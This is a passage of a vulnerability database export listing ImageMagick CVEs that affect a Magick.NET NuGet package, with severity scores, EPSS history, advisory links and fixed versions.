reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/e046417675d5c26e5f48816851a406c121c77469
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/e046417675d5c26e5f48816851a406c121c77469
7
reference_url https://github.com/ImageMagick/ImageMagick/issues/8567
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/issues/8567
8
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p863-5fgm-rgq4
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T15:20:58Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-p863-5fgm-rgq4
9
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25798
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25798
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442119
reference_id 2442119
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442119
11
reference_url https://github.com/advisories/GHSA-p863-5fgm-rgq4
reference_id GHSA-p863-5fgm-rgq4
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-p863-5fgm-rgq4
12
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25798, GHSA-p863-5fgm-rgq4
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pcme-bwan-3bcf
42
url VCID-r3vw-ncns-cqgb
vulnerability_id VCID-r3vw-ncns-cqgb
summary 
ImageMagick is vulnerable to heap buffer over-write on 32-bit systems in SFW decoder
An overflow on  32-bit systems can cause a crash in the SFW decoder when processing extremely large images.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31853.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-31853.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-31853
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02624
published_at 2026-04-11T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.02649
published_at 2026-04-09T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02629
published_at 2026-04-08T12:55:00Z
3
value 0.00014
scoring_system epss
scoring_elements 0.02625
published_at 2026-04-07T12:55:00Z
4
value 0.00014
scoring_system epss
scoring_elements 0.02621
published_at 2026-04-04T12:55:00Z
5
value 0.00014
scoring_system epss
scoring_elements 0.02606
published_at 2026-04-02T12:55:00Z
6
value 0.00015
scoring_system epss
scoring_elements 0.03335
published_at 2026-04-21T12:55:00Z
7
value 0.00015
scoring_system epss
scoring_elements 0.03252
published_at 2026-04-12T12:55:00Z
8
value 0.00015
scoring_system epss
scoring_elements 0.0323
published_at 2026-04-13T12:55:00Z
9
value 0.00015
scoring_system epss
scoring_elements 0.03205
published_at 2026-04-16T12:55:00Z
10
value 0.00015
scoring_system epss
scoring_elements 0.03215
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-31853
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31853
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-31853
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-56jp-jfqg-f8f4
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-11T17:41:49Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-56jp-jfqg-f8f4
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-31853
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-31853
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2446690
reference_id 2446690
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2446690
9
reference_url https://github.com/advisories/GHSA-56jp-jfqg-f8f4
reference_id GHSA-56jp-jfqg-f8f4
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-56jp-jfqg-f8f4
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-31853, GHSA-56jp-jfqg-f8f4
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-r3vw-ncns-cqgb
43
url VCID-rbdg-vz8x-ykah
vulnerability_id VCID-rbdg-vz8x-ykah
summary 
ImageMagick has heap use-after-free in the MSL encoder
A heap-use-after-free vulnerability exists in the MSL encoder, where a cloned image is destroyed twice. The MSL coder does not support writing MSL so the write capability has been removed. 

```
SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/image.c:1195 in DestroyImage
Shadow bytes around the buggy address:
  0x0a4e80007450: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0a4e80007460: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0a4e80007470: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0a4e80007480: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0a4e80007490: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0a4e800074a0: fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd
  0x0a4e800074b0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0a4e800074c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0a4e800074d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0a4e800074e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0a4e800074f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28688.json
reference_id
reference_type
scores
0
value 5.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28688.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28688
reference_id
reference_type
scores
0
value 0.00042
scoring_system epss
scoring_elements 0.12789
published_at 2026-04-09T12:55:00Z
1
value 0.00042
scoring_system epss
scoring_elements 0.12738
published_at 2026-04-08T12:55:00Z
2
value 0.00042
scoring_system epss
scoring_elements 0.12659
published_at 2026-04-07T12:55:00Z
3
value 0.00042
scoring_system epss
scoring_elements 0.12854
published_at 2026-04-04T12:55:00Z
4
value 0.00042
scoring_system epss
scoring_elements 0.12806
published_at 2026-04-02T12:55:00Z
5
value 0.00045
scoring_system epss
scoring_elements 0.13897
published_at 2026-04-21T12:55:00Z
6
value 0.00045
scoring_system epss
scoring_elements 0.14015
published_at 2026-04-11T12:55:00Z
7
value 0.00045
scoring_system epss
scoring_elements 0.13978
published_at 2026-04-12T12:55:00Z
8
value 0.00045
scoring_system epss
scoring_elements 0.13928
published_at 2026-04-13T12:55:00Z
9
value 0.00045
scoring_system epss
scoring_elements 0.13832
published_at 2026-04-16T12:55:00Z
10
value 0.00045
scoring_system epss
scoring_elements 0.13825
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28688
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28688
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28688
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xxw5-m53x-j38c
reference_id
reference_type
scores
0
value 4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T16:02:13Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-xxw5-m53x-j38c
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28688
reference_id
reference_type
scores
0
value 4.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28688
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445877
reference_id 2445877
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445877
9
reference_url https://github.com/advisories/GHSA-xxw5-m53x-j38c
reference_id GHSA-xxw5-m53x-j38c
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-xxw5-m53x-j38c
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28688, GHSA-xxw5-m53x-j38c
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rbdg-vz8x-ykah
44
url VCID-rj9n-ra1t-77dy
vulnerability_id VCID-rj9n-ra1t-77dy
summary 
ImageMagick has stack buffer overflow in MagnifyImage
MagnifyImage uses a fixed-size stack buffer. When using a specific image it is possible to overflow this buffer and corrupt the stack.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30929.json
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30929.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30929
reference_id
reference_type
scores
0
value 0.00015
scoring_system epss
scoring_elements 0.02811
published_at 2026-04-09T12:55:00Z
1
value 0.00015
scoring_system epss
scoring_elements 0.02791
published_at 2026-04-08T12:55:00Z
2
value 0.00015
scoring_system epss
scoring_elements 0.02787
published_at 2026-04-07T12:55:00Z
3
value 0.00015
scoring_system epss
scoring_elements 0.02779
published_at 2026-04-04T12:55:00Z
4
value 0.00015
scoring_system epss
scoring_elements 0.02764
published_at 2026-04-02T12:55:00Z
5
value 0.00017
scoring_system epss
scoring_elements 0.04009
published_at 2026-04-21T12:55:00Z
6
value 0.00017
scoring_system epss
scoring_elements 0.03945
published_at 2026-04-11T12:55:00Z
7
value 0.00017
scoring_system epss
scoring_elements 0.03928
published_at 2026-04-12T12:55:00Z
8
value 0.00017
scoring_system epss
scoring_elements 0.03899
published_at 2026-04-13T12:55:00Z
9
value 0.00017
scoring_system epss
scoring_elements 0.03878
published_at 2026-04-16T12:55:00Z
10
value 0.00017
scoring_system epss
scoring_elements 0.03889
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30929
2
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
3
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-rqq8-jh93-f4vg
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-10T14:52:35Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-rqq8-jh93-f4vg
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30929
reference_id
reference_type
scores
0
value 7.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30929
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445896
reference_id 2445896
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445896
8
reference_url https://github.com/advisories/GHSA-rqq8-jh93-f4vg
reference_id GHSA-rqq8-jh93-f4vg
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-rqq8-jh93-f4vg
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-30929, GHSA-rqq8-jh93-f4vg
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rj9n-ra1t-77dy
45
url VCID-rjkf-pdny-2fhn
vulnerability_id VCID-rjkf-pdny-2fhn
summary 
ImageMagick vulnerable to stack corruption through long morphology kernel names or arrays
A stack buffer overflow exists in ImageMagick's morphology kernel parsing functions. User-controlled kernel strings exceeding a buffer are copied into fixed-size stack buffers via memcpy without bounds checking, resulting in stack corruption.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28494.json
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-28494.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-28494
reference_id
reference_type
scores
0
value 0.00014
scoring_system epss
scoring_elements 0.02649
published_at 2026-04-09T12:55:00Z
1
value 0.00014
scoring_system epss
scoring_elements 0.02629
published_at 2026-04-08T12:55:00Z
2
value 0.00014
scoring_system epss
scoring_elements 0.02625
published_at 2026-04-07T12:55:00Z
3
value 0.00014
scoring_system epss
scoring_elements 0.02621
published_at 2026-04-04T12:55:00Z
4
value 0.00014
scoring_system epss
scoring_elements 0.02606
published_at 2026-04-02T12:55:00Z
5
value 0.00015
scoring_system epss
scoring_elements 0.03335
published_at 2026-04-21T12:55:00Z
6
value 0.00015
scoring_system epss
scoring_elements 0.03279
published_at 2026-04-11T12:55:00Z
7
value 0.00015
scoring_system epss
scoring_elements 0.03252
published_at 2026-04-12T12:55:00Z
8
value 0.00015
scoring_system epss
scoring_elements 0.0323
published_at 2026-04-13T12:55:00Z
9
value 0.00015
scoring_system epss
scoring_elements 0.03205
published_at 2026-04-16T12:55:00Z
10
value 0.00015
scoring_system epss
scoring_elements 0.03215
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-28494
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28494
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-28494
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-932h-jw47-73jm
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-10T14:40:59Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-932h-jw47-73jm
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-28494
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-28494
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445901
reference_id 2445901
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445901
9
reference_url https://github.com/advisories/GHSA-932h-jw47-73jm
reference_id GHSA-932h-jw47-73jm
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-932h-jw47-73jm
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-28494, GHSA-932h-jw47-73jm
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rjkf-pdny-2fhn
46
url VCID-sd54-b8z1-2fg7
vulnerability_id VCID-sd54-b8z1-2fg7
summary 
ImageMagick: Integer overflow or wraparound and incorrect conversion between numeric types in the internal SVG decoder
A crafted SVG file can cause a denial of service. An off-by-one boundary check (`>` instead of `>=`) that allows bypass the guard and reach an undefined `(size_t)` cast.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25989.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25989.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25989
reference_id
reference_type
scores
0
value 0.00019
scoring_system epss
scoring_elements 0.05228
published_at 2026-04-21T12:55:00Z
1
value 0.00019
scoring_system epss
scoring_elements 0.05076
published_at 2026-04-18T12:55:00Z
2
value 0.00019
scoring_system epss
scoring_elements 0.05071
published_at 2026-04-16T12:55:00Z
3
value 0.00019
scoring_system epss
scoring_elements 0.05124
published_at 2026-04-13T12:55:00Z
4
value 0.00019
scoring_system epss
scoring_elements 0.05137
published_at 2026-04-12T12:55:00Z
5
value 0.00019
scoring_system epss
scoring_elements 0.05154
published_at 2026-04-11T12:55:00Z
6
value 0.00019
scoring_system epss
scoring_elements 0.05183
published_at 2026-04-09T12:55:00Z
7
value 0.00019
scoring_system epss
scoring_elements 0.05167
published_at 2026-04-08T12:55:00Z
8
value 0.00019
scoring_system epss
scoring_elements 0.05133
published_at 2026-04-07T12:55:00Z
9
value 0.00019
scoring_system epss
scoring_elements 0.05082
published_at 2026-04-02T12:55:00Z
10
value 0.00019
scoring_system epss
scoring_elements 0.05112
published_at 2026-04-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25989
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25989
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25989
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/5a545ab9d6c3d12a6a76cfed32b87df096729d95
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/5a545ab9d6c3d12a6a76cfed32b87df096729d95
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7355-pwx2-pm84
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:08:53Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-7355-pwx2-pm84
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25989
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
